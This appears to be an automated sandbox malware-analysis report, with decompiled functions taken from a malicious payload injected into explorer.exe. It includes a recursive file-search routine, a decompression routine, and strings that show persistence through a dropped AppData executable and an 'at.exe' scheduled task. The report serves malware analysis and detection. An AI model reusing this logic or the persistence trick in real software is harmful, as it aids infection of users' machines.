0x003ff856
0x003ff859
0x003ff85f
0x003ff862
0x003ff862
0x003ff864
0x00000000
0x00000000
0x003ff866
0x003ff868
0x003ff86f
0x003ff899
0x003ff899
0x003ff89b
0x00000000
0x00000000
0x003ff89d
0x003ff89f
0x003ff8a8
0x003ff8ad
0x003ff8b0
0x003ff8b7
0x003ffb94
0x003ffb94
0x003ffb96
0x00000000
0x00000000
0x003ffb98
0x003ffb9a
0x003ffb9a
0x003ffbca
0x003ffbdd
0x003ffbf1
0x003ffbfe
0x003ffc0d
0x003ffc15
0x003ffc17
0x003ffc20
0x003ffc20
0x003ffc26
0x003ffc2b
0x003ffc2b
0x003ffc2d
0x003ffc30
0x003ffc3d
0x003ffc3d
0x003ff8bd
0x003ff8c4
0x003ff8c6
0x003ff8cd
0x003ff8d3
0x003ff8d3
0x003ff8cd
0x003ff8d9
0x003ff8d9
0x003ff8db
0x00000000
0x00000000
0x003ff8dd
0x003ff8df
0x003ff8df
0x003ff8df
0x003ff8e1
0x00000000
0x00000000
0x003ff8e3
0x003ff8e5
0x003ff8ec
0x003ffb92
0x00000000
0x003ffb92
0x003ff8f2
0x003ff8f9
0x003ff9ea
0x003ff9ea
0x003ff9ec
0x00000000
0x00000000
0x003ff9ee
0x003ff9f0
0x003ff9f7
0x00000000
0x00000000
0x003ff9fd
0x003ffa04
0x00000000
0x00000000
0x003ffa0a
0x003ffa14
0x003ffa14
0x003ffa16
0x00000000
0x00000000
0x003ffa18
0x003ffa1a
0x003ffa2a
0x003ffa39
0x003ffa49
0x003ffa5e
0x003ffa68
0x003ffa76
0x003ffa7e
0x003ffa8f
0x003ffaa4
0x003ffaae
0x003ffabc
0x003ffac2
0x003ffac2
0x003ffac4
0x003ffad8
0x003ffaee
0x003ffafd
0x003ffb05
0x003ffb0d
0x003ffb15
0x003ffb1c
0x003ffb1d
0x003ffb28
0x003ffb41
0x003ffb50
0x003ffb58
0x003ffb58
0x003ffb5a
0x00000000
0x00000000
0x003ffb5c
0x003ffb6e
0x003ffb76
0x003ffb80
0x003ffb87
0x00000000
0x003ffb87
0x003ff8ff
0x003ff906
0x00000000
0x00000000
0x00000000
0x00000000
0x003ff90c
0x003ff90c
0x003ff90c
0x003ff90e
0x00000000
0x00000000
0x003ff910
0x003ff912
0x003ff922
0x003ff931
0x003ff941
0x003ff956
0x003ff960
0x003ff96e
0x003ff974
0x003ff974
0x003ff976
0x003ff97d
0x003ff989
0x003ff99c
0x003ff9a3
0x003ff9ab
0x003ff9ab
0x003ff9ad
0x00000000
0x00000000
0x003ff9af
0x003ff9c1
0x003ff9c9
0x003ff9d3
0x003ff9da
0x00000000
0x003ff9da
0x003ff87f
0x003ff885
0x003ff887
0x003ff891
0x003ff891
0x003ff893
0x00000000
0x00000000
0x003ff895
0x003ff897
0x00000000
0x00000000
0x00000000
0x00000000
0x003ff889
0x003ff889
0x003ff889
0x003ff88b
0x00000000
0x00000000
0x003ff88d
0x00000000
0x003ff88f
0x003ff820
0x003ff827
0x00000000
0x00000000
0x003ff829
0x003ff830
0x00000000
0x00000000
0x003ff836
0x003ff83d
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x003ff7fe
0x003ff7fe
0x003ff7fe
0x003ff800
0x00000000
0x00000000
0x003ff802
0x003ff804
0x003ff808
0x003ff80d
0x00000000
0x003ff80d
0x003ff7e6
0x00000000
0x00000000
0x00000000
0x00000000
0x003ff7ca
0x003ff7ca
0x003ff7ca
0x003ff7ca
0x003ff7cc
0x00000000
0x00000000
0x003ff7ce
0x00000000
0x003ff7d0
0x003ff7a9
0x003ff7ad
0x003ff7af
0x00000000

APIs

Part of subcall function 003FC0D0: GetModuleHandleA.KERNEL32(7E5E2BF0), ref: 003FC128
Part of subcall function 003FC0D0: GetModuleHandleA.KERNEL32(E020144A), ref: 003FC138

memset.MSVCRT(?,00000000,00000010), ref: 003FF922
GetLocalTime.KERNEL32(?), ref: 003FF931
lstrcpynW.KERNEL32(?,C:\Windows\explorer.exe,00000104), ref: 003FFBCA
lstrcatW.KERNEL32(?,?), ref: 003FFBF1

Part of subcall function 003FE080: GetFileAttributesW.KERNEL32(?,?,?,003FFC12,?), ref: 003FE088

DeleteFileW.KERNEL32(?), ref: 003FFC20

Strings

C:\Users\user\AppData\Roaming\Microsoft\Eacrrvkown\jkfkdm.exe, xrefs: 003FF97D, 003FFB1D
C:\Windows, xrefs: 003FFB29
at.exe %u:%u "%s" /I, xrefs: 003FF992
C:\Windows\explorer.exe, xrefs: 003FFBBE

Memory Dump Source

Source File: 0000000C.00000002.752639572.003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_3f0000_explorer.jbxd

Yara matches

Similarity

API ID: FileHandleModule$AttributesDeleteLocalTimelstrcatlstrcpynmemset
String ID: C:\Users\user\AppData\Roaming\Microsoft\Eacrrvkown\jkfkdm.exe$C:\Windows$C:\Windows\explorer.exe$at.exe %u:%u "%s" /I
API String ID: 1040344659-3748428255
Opcode ID: 302021c269c401b8a0f5dcb073208cd50299c51ddcc964c6f4e00510d59593d3
Instruction ID: 9b04dcb122a35b95a74e841cb2ac06cea5dcb2a238a45ce682234833316fd8bd
Opcode Fuzzy Hash: 302021c269c401b8a0f5dcb073208cd50299c51ddcc964c6f4e00510d59593d3
Instruction Fuzzy Hash: A2C1F47190021CDEDB71EB60DC45BBA7374AF44705F1485BAFB09A61E0EBB44A84CF66

Uniqueness

Uniqueness Score: 100.00%

Function 0151B870, Relevance: 9.2, APIs: 6, Instructions: 155
sleepfilesynchronizationUNIQUE

Download Yara Rule

C-Code - Quality: 66%

			E0151B870(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16, intOrPtr _a20, signed int _a24, void* _a28, long _a32, long _a36) {
				signed int _v8;
				struct _WIN32_FIND_DATAW _v604;
				void* _v608;
				WCHAR* _v612;
				long _v616;
				char _v620;
				WCHAR* _t58;
				void* _t62;
				char _t71;
				void* _t84;
				void* _t110;
				void* _t111;

				_v8 = 0;
				_v612 = 0;
				_push(0);
				_push(L"\\*");
				_t58 = E01516F50(_a4);
				_t111 = _t110 + 0xc;
				_v612 = _t58;
				if(_v612 != 0) {
					_v608 = FindFirstFileW(_v612,  &_v604);
					if(_v608 == 0xffffffff) {
						L32:
						return E01513990( &_v612, 0xfffffffe);
					}
					_v616 = 0;
					do {
						if(_a28 == 0) {
							L9:
							_t62 = E0151B820(_t85,  &(_v604.cFileName));
							_t111 = _t111 + 4;
							if(_t62 != 0) {
								goto L30;
							}
							if((_v604.dwFileAttributes & 0x00000010) == 0) {
								L12:
								if((_v604.dwFileAttributes & 0x00000010) != 0 || (_a16 & 0x00000004) == 0) {
									L24:
									if((_v604.dwFileAttributes & 0x00000010) != 0 && (_a16 & 0x00000001) != 0) {
										_push(0);
										_t85 =  &(_v604.cFileName);
										_push( &(_v604.cFileName));
										_push("\\");
										_t71 = E01516F50(_a4);
										_t111 = _t111 + 0x10;
										_v620 = _t71;
										if(_v620 == 0) {
											goto L30;
										}
										if(_a32 != 0) {
											Sleep(_a32);
										}
										E0151B870(_v620, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36);
										_t85 =  &_v620;
										E01513990( &_v620, 0xfffffffe);
										_t111 = _t111 + 0x2c;
									}
									goto L30;
								} else {
									L14:
									_v8 = 0;
									while(_v8 < _a12) {
										if(PathMatchSpecW( &(_v604.cFileName),  *(_a8 + _v8 * 4)) == 0) {
											L23:
											_t85 = _v8 + 1;
											_v8 = _v8 + 1;
											continue;
										}
										_t85 = _a24;
										_t84 = _a20(_a4,  &_v604, _a24);
										_t111 = _t111 + 0xc;
										if(_t84 == 0) {
											_v616 = 1;
											goto L24;
										}
										if(_a36 != 0) {
											Sleep(_a36);
										}
										goto L23;
									}
									goto L24;
								}
							}
							_t85 = _a16 & 0x00000002;
							if((_a16 & 0x00000002) != 0) {
								goto L14;
							}
							goto L12;
						}
						_t85 = _a28;
						if(WaitForSingleObject(_a28, 0) == 0x102) {
							goto L9;
						}
						break;
						L30:
					} while (FindNextFileW(_v608,  &_v604) != 0);
					 *0x153a9f8(_v608);
					goto L32;
				}
				while(0 != 0) {
				}
				return _t58;
			}

0x0151b879
0x0151b880
0x0151b88a
0x0151b88c
0x0151b895
0x0151b89a
0x0151b89d
0x0151b8aa
0x0151b8cb
0x0151b8d8
0x0151ba6a
0x00000000
0x0151ba78
0x0151b8de
0x0151b8e8
0x0151b8ec
0x0151b906
0x0151b90d
0x0151b912
0x0151b917
0x00000000
0x00000000
0x0151b926
0x0151b930
0x0151b939
0x0151b9b1
0x0151b9ba
0x0151b9c8
0x0151b9ca
0x0151b9d0
0x0151b9d1
0x0151b9da
0x0151b9df
0x0151b9e2
0x0151b9ef
0x00000000
0x00000000
0x0151b9f5
0x0151b9fb
0x0151b9fb
0x0151ba28
0x0151ba32
0x0151ba39
0x0151ba3e
0x0151ba3e
0x00000000
0x0151b943
0x0151b943
0x0151b943
0x0151b955
0x0151b976
0x0151b9af
0x0151b94f
0x0151b952
0x00000000
0x0151b952
0x0151b978
0x0151b987
0x0151b98a
0x0151b98f
0x0151b9a3
0x00000000
0x0151b9a3
0x0151b995
0x0151b99b
0x0151b99b
0x00000000
0x0151b9a1
0x00000000
0x0151b955
0x0151b939
0x0151b92b
0x0151b92e
0x00000000
0x00000000
0x00000000
0x0151b92e
0x0151b8f0
0x0151b8ff
0x00000000
0x00000000
0x00000000
0x0151ba41
0x0151ba55
0x0151ba64
0x00000000
0x0151ba64
0x0151b8ac
0x0151b8b0
0x00000000

APIs

Part of subcall function 01516F50: lstrlenW.KERNEL32(?), ref: 01516F78

FindFirstFileW.KERNEL32(00000000,?), ref: 0151B8C5
WaitForSingleObject.KERNEL32(00000000,00000000), ref: 0151B8F4
PathMatchSpecW.SHLWAPI(?,?), ref: 0151B96E
Sleep.KERNEL32(00000000), ref: 0151B99B
Sleep.KERNEL32(00000000), ref: 0151B9FB
FindNextFileW.KERNEL32(000000FF,?), ref: 0151BA4F

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: FileFindSleep$FirstMatchNextObjectPathSingleSpecWaitlstrlen
String ID:
API String ID: 517015195-0
Opcode ID: 805505037b0fd3dcb486ab077735b613b5b87c802aeb0a369118195b3ede1244
Instruction ID: 2bcf79b9d287655722558298550ad4089c824fe1a9be762467fb11e4d80b4c5f
Opcode Fuzzy Hash: 805505037b0fd3dcb486ab077735b613b5b87c802aeb0a369118195b3ede1244
Instruction Fuzzy Hash: C3519172904218ABEB25CF58CC88BDE7775FB88305F044688F909AF288D775DA81CF51

Uniqueness

Uniqueness Score: 100.00%

Function 015269AF, Relevance: 8.1, Strings: 6, Instructions: 577
COMMONCrypto

Download Yara Rule

C-Code - Quality: 81%

			E015269AF(void* __edi) {
				signed int _t164;
				unsigned int _t172;
				unsigned int _t173;
				signed int _t174;
				signed int _t176;
				signed int _t178;
				signed int _t179;
				signed int _t182;
				signed int _t184;
				unsigned int _t185;
				int _t186;
				int _t194;
				signed char _t200;
				signed int _t207;
				signed int _t208;
				signed int _t209;
				int _t210;
				int _t222;
				signed int _t227;
				signed int _t235;
				signed int _t251;
				signed char _t252;
				unsigned int _t253;
				signed char _t254;
				signed int* _t255;
				signed int _t258;
				signed int _t259;
				signed int _t260;
				signed int _t266;
				intOrPtr _t271;
				signed char _t278;
				signed int _t279;
				char* _t280;
				signed int _t282;
				signed char _t284;
				signed int _t287;
				signed int _t291;
				int _t292;
				int _t293;
				int _t296;
				int _t298;
				int _t302;
				signed int _t305;
				signed char _t311;
				signed char _t312;
				signed char _t315;
				signed char _t316;
				signed int _t318;
				int _t319;
				int _t320;
				signed char _t322;
				int _t324;
				int _t326;
				int _t330;
				signed int _t333;
				signed char _t336;
				signed char _t337;
				signed char _t339;
				int _t341;
				signed int _t347;
				int _t349;
				intOrPtr _t350;
				intOrPtr _t351;
				unsigned int _t356;
				unsigned int _t361;
				signed int _t364;
				signed int _t365;
				intOrPtr _t367;
				void* _t368;
				intOrPtr* _t380;
				void* _t381;
				intOrPtr* _t389;
				void* _t390;
				signed int _t395;
				void* _t396;
				signed int _t397;
				void* _t403;
				void* _t405;
				intOrPtr* _t412;
				void* _t413;
				signed int _t414;
				void* _t416;
				intOrPtr* _t423;
				void* _t424;
				unsigned int _t430;
				signed int _t431;
				void* _t434;
				signed int* _t435;
				void* _t439;

				 *((intOrPtr*)(__edi + 0x56))();
				asm("pushfd");
				_t435 = _t434 - 0x40;
				asm("cld");
				_t395 = _t435[0x16];
				_t367 =  *((intOrPtr*)(_t395 + 0x1c));
				_t164 =  *_t395;
				_t435[0xb] = _t164;
				_t435[5] =  *((intOrPtr*)(_t395 + 4)) + _t164 - 0xb;
				_t271 =  *((intOrPtr*)(_t395 + 0x10));
				_t251 =  *(_t395 + 0xc);
				_t435[0xf] = _t251;
				_t435[0xa] =  ~(_t435[0x17] - _t271) + _t251;
				_t435[4] = _t271 - 0x101 + _t251;
				_t435[2] =  *(_t367 + 0x4c);
				_t435[3] =  *(_t367 + 0x50);
				 *_t435 = (1 <<  *(_t367 + 0x54)) - 1;
				_t435[1] = (1 <<  *(_t367 + 0x58)) - 1;
				_t172 =  *(_t367 + 0x28);
				_t347 =  *(_t367 + 0x34);
				_t435[0xd] = _t172;
				_t435[0xc] =  *(_t367 + 0x30);
				_t435[0xe] = _t347;
				_t430 =  *(_t367 + 0x38);
				_t252 =  *(_t367 + 0x3c);
				_t396 = _t435[0xb];
				_t278 = _t435[5];
				if(_t278 > _t396) {
					L2:
					if((_t396 & 0x00000003) != 0) {
						_t396 = _t396 + 1;
						_t278 = _t252;
						_t252 = _t252 + 8;
						_t172 = 0 << _t278;
						_t430 = _t430 | _t172;
						goto L2;
					}
					goto L4;
				} else {
					_t341 = _t278 + 0xb - _t396;
					_t172 = memset(_t396 + _t341 + _t341, 0, memcpy( &(_t435[7]), _t396, _t341) << 0);
					_t435 =  &(_t435[6]);
					_t278 = 0;
					_t396 =  &(_t435[7]);
					_t435[5] = _t396;
					L4:
					_t368 = _t435[0xf];
					while(1) {
						_t439 =  *0x15378c0 - 2;
						if(_t439 == 0) {
							break;
						}
						if(_t439 > 0) {
							do {
								if(_t252 <= 0xf) {
									asm("lodsw");
									_t322 = _t252;
									_t252 = _t252 + 0x10;
									_t430 = _t431 | 0 << _t322;
								}
								_t173 =  *(_t435[2] + ( *_t435 & _t430) * 4);
								while(1) {
									_t253 = _t252 - _t173;
									_t431 = _t430 >> _t173;
									if(_t173 == 0) {
										asm("stosb");
										goto L22;
									}
									_t356 = _t173 >> 0x10;
									_t311 = _t173;
									if((_t173 & 0x00000010) == 0) {
										if((_t173 & 0x00000040) != 0) {
											L97:
											if((_t173 & 0x00000020) == 0) {
												_t280 = "invalid literal/length code";
												_t350 = 0x1a;
											} else {
												_t280 = 0;
												_t350 = 0xb;
											}
											L101:
											_t174 = _t435[0x16];
											if(_t280 != 0) {
												 *(_t174 + 0x18) = _t280;
											}
											 *((intOrPtr*)( *((intOrPtr*)(_t174 + 0x1c)))) = _t350;
											goto L104;
										}
										_t173 =  *(_t435[2] + (((0x00000001 << _t311) - 0x00000001 & _t431) + _t356) * 4);
										continue;
									}
									_t312 = _t311 & 0x0000000f;
									if(_t312 != 0) {
										if(_t253 < _t312) {
											asm("lodsw");
											_t339 = _t253;
											_t253 = _t253 + 0x10;
											_t431 = _t431 | 0 << _t339;
											_t312 = _t339;
										}
										_t253 = _t253 - _t312;
										_t235 = (0x00000001 << _t312) - 0x00000001 & _t431;
										_t431 = _t431 >> _t312;
										_t356 = _t356 + _t235;
									}
									_t435[6] = _t356;
									if(_t253 <= 0xf) {
										asm("lodsw");
										_t337 = _t253;
										_t253 = _t253 + 0x10;
										_t431 = _t431 | 0 << _t337;
									}
									_t200 =  *(_t435[3] + (_t435[1] & _t431) * 4);
									while(1) {
										_t361 = _t200 >> 0x10;
										_t253 = _t253 - _t200;
										_t431 = _t431 >> _t200;
										_t315 = _t200;
										if((_t200 & 0x00000010) != 0) {
											break;
										}
										if((_t200 & 0x00000040) != 0) {
											L96:
											_t280 = "invalid distance code";
											_t350 = 0x1a;
											goto L101;
										}
										_t200 =  *(_t435[3] + (((0x00000001 << _t315) - 0x00000001 & _t431) + _t361) * 4);
									}
									_t316 = _t315 & 0x0000000f;
									if(_t316 == 0) {
										if(_t361 != 1 || _t435[0xa] == _t368) {
											L38:
											_t435[0xb] = _t396;
											_t207 = _t368 - _t435[0xa];
											if(_t207 < _t361) {
												_t208 = _t435[0xd];
												_t318 =  ~_t207;
												_t414 = _t435[0xe];
												if(_t208 < _t361) {
													L100:
													_t396 = _t435[0xb];
													_t280 = "invalid distance too far back";
													_t350 = 0x1a;
													goto L101;
												}
												_t319 = _t318 + _t361;
												if(_t435[0xc] != 0) {
													_t209 = _t435[0xc];
													if(_t319 <= _t209) {
														_t416 = _t414 + _t209 - _t319;
														_t210 = _t435[6];
														if(_t210 > _t319) {
															_t210 = memcpy(_t368, _t416, _t319);
															_t435 =  &(_t435[3]);
															_t368 = _t416 + _t319 + _t319;
															_t416 = _t368 - _t361;
														}
													} else {
														_t416 = _t414 + _t435[0xd] + _t209 - _t319;
														_t324 = _t319 - _t209;
														_t210 = _t435[6];
														if(_t210 > _t324) {
															_t210 = memcpy(_t368, _t416, _t324);
															_t435 =  &(_t435[3]);
															_t368 = _t416 + _t324 + _t324;
															_t416 = _t435[0xe];
															_t326 = _t435[0xc];
															if(_t210 > _t326) {
																_t210 = memcpy(_t368, _t416, _t326);
																_t435 =  &(_t435[3]);
																_t368 = _t416 + _t326 + _t326;
																_t416 = _t368 - _t361;
															}
														}
													}
												} else {
													_t416 = _t414 + _t208 - _t319;
													_t210 = _t435[6];
													if(_t210 > _t319) {
														_t210 = memcpy(_t368, _t416, _t319);
														_t435 =  &(_t435[3]);
														_t368 = _t416 + _t319 + _t319;
														_t416 = _t368 - _t361;
													}
												}
												_t320 = _t210;
												memcpy(_t368, _t416, _t320);
												_t435 =  &(_t435[3]);
												_t368 = _t416 + _t320 + _t320;
												_t396 = _t435[0xb];
												goto L22;
											}
											_t423 = _t368 - _t361;
											_t330 = _t435[6] - 3;
											 *_t368 =  *_t423;
											_t424 = _t423 + 3;
											 *((char*)(_t368 + 1)) =  *((intOrPtr*)(_t423 + 1));
											 *((char*)(_t368 + 2)) =  *((intOrPtr*)(_t423 + 2));
											memcpy(_t368 + 3, _t424, _t330);
											_t435 =  &(_t435[3]);
											_t368 = _t424 + _t330 + _t330;
											_t396 = _t435[0xb];
										} else {
											_t389 = _t368 - 1;
											_t222 =  *_t389;
											_t333 = _t435[6] - 3;
											 *(_t389 + 1) = _t222;
											 *(_t389 + 2) = _t222;
											 *(_t389 + 3) = _t222;
											_t390 = _t389 + 4;
											memset(_t390, _t222, _t333 << 0);
											_t435 =  &(_t435[3]);
											_t368 = _t390 + _t333;
										}
										goto L22;
									}
									if(_t253 < _t316) {
										asm("lodsw");
										_t336 = _t253;
										_t253 = _t253 + 0x10;
										_t431 = _t431 | 0 << _t336;
										_t316 = _t336;
									}
									_t253 = _t253 - _t316;
									_t227 = (0x00000001 << _t316) - 0x00000001 & _t431;
									_t431 = _t431 >> _t316;
									_t361 = _t361 + _t227;
									goto L38;
								}
								L22:
							} while (_t435[4] > _t368 && _t435[5] > _t396);
							L104:
							if( *0x15378c0 == 2) {
								_t253 = _t431;
							}
							_t176 = _t435[0x16];
							_t351 =  *((intOrPtr*)(_t176 + 0x1c));
							_t282 = _t253 >> 3;
							_t397 = _t396 - _t282;
							_t254 = _t253 - (_t282 << 3);
							 *(_t176 + 0xc) = _t368;
							 *(_t351 + 0x3c) = _t254;
							_t284 = _t254;
							_t255 =  &(_t435[7]);
							if(_t435[5] == _t255) {
								_t266 =  *_t176;
								_t435[5] = _t266;
								_t397 = _t397 - _t255 + _t266;
								_t435[5] = _t435[5] +  *((intOrPtr*)(_t176 + 4)) - 0xb;
							}
							 *_t176 = _t397;
							_t258 = (1 << _t284) - 1;
							if( *0x15378c0 == 2) {
								asm("psrlq mm0, mm1");
								asm("movd ebp, mm0");
								asm("emms");
							}
							 *(_t351 + 0x38) = _t431 & _t258;
							_t259 = _t435[5];
							if(_t259 <= _t397) {
								 *((intOrPtr*)(_t176 + 4)) =  ~(_t397 - _t259) + 0xb;
							} else {
								 *((intOrPtr*)(_t176 + 4)) = _t259 - _t397 + 0xb;
							}
							_t260 = _t435[4];
							if(_t260 <= _t368) {
								 *((intOrPtr*)(_t176 + 0x10)) =  ~(_t368 - _t260) + 0x101;
							} else {
								 *((intOrPtr*)(_t176 + 0x10)) = _t260 - _t368 + 0x101;
							}
							asm("popfd");
							return _t176;
						}
						_push(_t172);
						_push(_t252);
						_push(_t278);
						_push(_t347);
						asm("pushfd");
						 *_t435 =  *_t435 ^ 0x00200000;
						asm("popfd");
						asm("pushfd");
						_pop(_t364);
						_t365 = _t364 ^  *_t435;
						if(_t365 == 0) {
							L15:
							 *0x15378c0 = 3;
							L16:
							_pop(_t347);
							_pop(_t278);
							_pop(_t252);
							_pop(_t172);
							continue;
						}
						asm("cpuid");
						if(_t252 != 0x756e6547 || _t278 != 0x6c65746e || _t365 != 0x49656e69) {
							goto L15;
						} else {
							asm("cpuid");
							if(0xd != 6 || (_t365 & 0x00800000) == 0) {
								goto L15;
							} else {
								 *0x15378c0 = 2;
								goto L16;
							}
						}
					}
					asm("emms");
					asm("movd mm0, ebp");
					_t431 = _t252;
					asm("movd mm4, dword [esp]");
					asm("movq mm3, mm4");
					asm("movd mm5, dword [esp+0x4]");
					asm("movq mm2, mm5");
					asm("pxor mm1, mm1");
					_t253 = _t435[2];
					do {
						asm("psrlq mm0, mm1");
						if(_t431 <= 0x20) {
							asm("movd mm6, ebp");
							asm("movd mm7, dword [esi]");
							_t396 = _t396 + 4;
							asm("psllq mm7, mm6");
							_t431 = _t431 + 0x20;
							asm("por mm0, mm7");
						}
						asm("pand mm4, mm0");
						asm("movd eax, mm4");
						asm("movq mm4, mm3");
						_t173 =  *(_t253 + _t172 * 4);
						while(1) {
							_t279 = _t173 & 0x000000ff;
							asm("movd mm1, ecx");
							_t431 = _t431 - _t279;
							if(_t173 == 0) {
								break;
							}
							_t349 = _t173 >> 0x10;
							if((_t173 & 0x00000010) == 0) {
								if((_t173 & 0x00000040) != 0) {
									goto L97;
								}
								asm("psrlq mm0, mm1");
								asm("movd ecx, mm0");
								_t173 =  *(_t253 + ((_t279 &  *(0x152692c + (_t173 & 0x0000000f) * 4)) + _t349) * 4);
								continue;
							}
							_t178 = _t173 & 0x0000000f;
							if(_t178 != 0) {
								asm("psrlq mm0, mm1");
								asm("movd mm1, eax");
								asm("movd ecx, mm0");
								_t431 = _t431 - _t178;
								_t349 = _t349 + (_t279 &  *(0x152692c + _t178 * 4));
							}
							asm("psrlq mm0, mm1");
							if(_t431 <= 0x20) {
								asm("movd mm6, ebp");
								asm("movd mm7, dword [esi]");
								_t396 = _t396 + 4;
								asm("psllq mm7, mm6");
								_t431 = _t431 + 0x20;
								asm("por mm0, mm7");
							}
							asm("pand mm5, mm0");
							asm("movd eax, mm5");
							asm("movq mm5, mm2");
							_t179 =  *(_t435[3] + _t178 * 4);
							while(1) {
								_t287 = _t179 & 0x000000ff;
								_t253 = _t179 >> 0x10;
								_t431 = _t431 - _t287;
								asm("movd mm1, ecx");
								if((_t179 & 0x00000010) != 0) {
									break;
								}
								if((_t179 & 0x00000040) != 0) {
									goto L96;
								}
								asm("psrlq mm0, mm1");
								asm("movd ecx, mm0");
								_t179 =  *(_t435[3] + ((_t287 &  *(0x152692c + (_t179 & 0x0000000f) * 4)) + _t253) * 4);
							}
							_t182 = _t179 & 0x0000000f;
							if(_t182 == 0) {
								if(_t253 != 1 || _t435[0xa] == _t368) {
									L76:
									_t435[0xb] = _t396;
									_t184 = _t368 - _t435[0xa];
									if(_t184 < _t253) {
										_t185 = _t435[0xd];
										_t291 =  ~_t184;
										_t403 = _t435[0xe];
										if(_t185 < _t253) {
											goto L100;
										}
										_t292 = _t291 + _t253;
										if(_t435[0xc] != 0) {
											_t186 = _t435[0xc];
											if(_t292 <= _t186) {
												_t405 = _t403 + _t186 - _t292;
												if(_t349 > _t292) {
													_t349 = _t349 - _t292;
													memcpy(_t368, _t405, _t292);
													_t435 =  &(_t435[3]);
													_t368 = _t405 + _t292 + _t292;
													_t405 = _t368 - _t253;
												}
											} else {
												_t405 = _t403 + _t435[0xd] + _t186 - _t292;
												_t296 = _t292 - _t186;
												if(_t349 > _t296) {
													_t349 = _t349 - _t296;
													memcpy(_t368, _t405, _t296);
													_t435 =  &(_t435[3]);
													_t368 = _t405 + _t296 + _t296;
													_t405 = _t435[0xe];
													_t298 = _t435[0xc];
													if(_t349 > _t298) {
														_t349 = _t349 - _t298;
														memcpy(_t368, _t405, _t298);
														_t435 =  &(_t435[3]);
														_t368 = _t405 + _t298 + _t298;
														_t405 = _t368 - _t253;
													}
												}
											}
										} else {
											_t405 = _t403 + _t185 - _t292;
											if(_t349 > _t292) {
												_t349 = _t349 - _t292;
												memcpy(_t368, _t405, _t292);
												_t435 =  &(_t435[3]);
												_t368 = _t405 + _t292 + _t292;
												_t405 = _t368 - _t253;
											}
										}
										_t293 = _t349;
										_t172 = memcpy(_t368, _t405, _t293);
										_t435 =  &(_t435[3]);
										_t368 = _t405 + _t293 + _t293;
										_t396 = _t435[0xb];
										_t253 = _t435[2];
										goto L64;
									}
									_t412 = _t368 - _t253;
									_t302 = _t349 - 3;
									 *_t368 =  *_t412;
									_t413 = _t412 + 3;
									 *((char*)(_t368 + 1)) =  *((intOrPtr*)(_t412 + 1));
									 *((char*)(_t368 + 2)) =  *((intOrPtr*)(_t412 + 2));
									_t172 = memcpy(_t368 + 3, _t413, _t302);
									_t435 =  &(_t435[3]);
									_t368 = _t413 + _t302 + _t302;
									_t396 = _t435[0xb];
									_t253 = _t435[2];
									goto L64;
								} else {
									_t380 = _t368 - 1;
									_t194 =  *_t380;
									_t305 = _t349 - 3;
									 *(_t380 + 1) = _t194;
									 *(_t380 + 2) = _t194;
									 *(_t380 + 3) = _t194;
									_t381 = _t380 + 4;
									_t172 = memset(_t381, _t194, _t305 << 0);
									_t435 =  &(_t435[3]);
									_t368 = _t381 + _t305;
									_t253 = _t435[2];
									L64:
									if(_t435[4] <= _t368) {
										goto L104;
									}
									goto L65;
								}
							}
							asm("psrlq mm0, mm1");
							asm("movd mm1, eax");
							asm("movd ecx, mm0");
							_t431 = _t431 - _t182;
							_t253 = _t253 + (_t287 &  *(0x152692c + _t182 * 4));
							goto L76;
						}
						_t172 = _t173 >> 0x10;
						asm("stosb");
						goto L64;
						L65:
					} while (_t435[5] > _t396);
					goto L104;
				}
			}

0x015269af
0x015269b4
0x015269b5
0x015269b8
0x015269b9
0x015269bd
0x015269c3
0x015269ca
0x015269ce
0x015269d6
0x015269d9
0x015269ea
0x015269ee
0x015269f2
0x015269fc
0x01526a00
0x01526a0f
0x01526a1d
0x01526a21
0x01526a27
0x01526a2a
0x01526a2e
0x01526a32
0x01526a36
0x01526a39
0x01526a3c
0x01526a40
0x01526a46
0x01526a6a
0x01526a70
0x01526a76
0x01526a77
0x01526a79
0x01526a7c
0x01526a7e
0x00000000
0x01526a7e
0x00000000
0x01526a48
0x01526a4b
0x01526a5e
0x01526a5e
0x01526a5e
0x01526a60
0x01526a64
0x01526a82
0x01526a82
0x01526a86
0x01526a86
0x01526a8d
0x00000000
0x00000000
0x01526a93
0x01526b00
0x01526b03
0x01526b07
0x01526b09
0x01526b0b
0x01526b10
0x01526b10
0x01526b1b
0x01526b1e
0x01526b20
0x01526b22
0x01526b26
0x01526b2b
0x01526b2b
0x01526b2b
0x01526b43
0x01526b46
0x01526b4a
0x01526c46
0x01526f5a
0x01526f5c
0x01526f6a
0x01526f6f
0x01526f5e
0x01526f5e
0x01526f63
0x01526f63
0x01526f86
0x01526f86
0x01526f8c
0x01526f8e
0x01526f8e
0x01526f94
0x00000000
0x01526f94
0x01526c5c
0x00000000
0x01526c5c
0x01526b50
0x01526b53
0x01526b57
0x01526b5d
0x01526b5f
0x01526b61
0x01526b66
0x01526b68
0x01526b68
0x01526b72
0x01526b74
0x01526b76
0x01526b78
0x01526b78
0x01526b7a
0x01526b81
0x01526b85
0x01526b87
0x01526b89
0x01526b8e
0x01526b8e
0x01526b9a
0x01526b9d
0x01526b9f
0x01526ba4
0x01526ba6
0x01526ba8
0x01526bac
0x00000000
0x00000000
0x01526c66
0x01526f4e
0x01526f4e
0x01526f53
0x00000000
0x01526f53
0x01526c7c
0x01526c7c
0x01526bb2
0x01526bb5
0x01526c1f
0x01526bde
0x01526bde
0x01526be4
0x01526bea
0x01526c86
0x01526c8a
0x01526c8c
0x01526c92
0x01526f76
0x01526f76
0x01526f7a
0x01526f7f
0x00000000
0x01526f7f
0x01526c98
0x01526c9f
0x01526cc5
0x01526ccb
0x01526cfb
0x01526cfd
0x01526d03
0x01526d07
0x01526d07
0x01526d07
0x01526d0b
0x01526d0b
0x01526ccd
0x01526cd3
0x01526cd5
0x01526cd7
0x01526cdd
0x01526ce1
0x01526ce1
0x01526ce1
0x01526ce3
0x01526ce7
0x01526ced
0x01526cf1
0x01526cf1
0x01526cf1
0x01526cf5
0x01526cf5
0x01526ced
0x01526cdd
0x01526ca1
0x01526ca3
0x01526ca5
0x01526cab
0x01526caf
0x01526caf
0x01526caf
0x01526cb3
0x01526cb3
0x01526cab
0x01526d0d
0x01526d0f
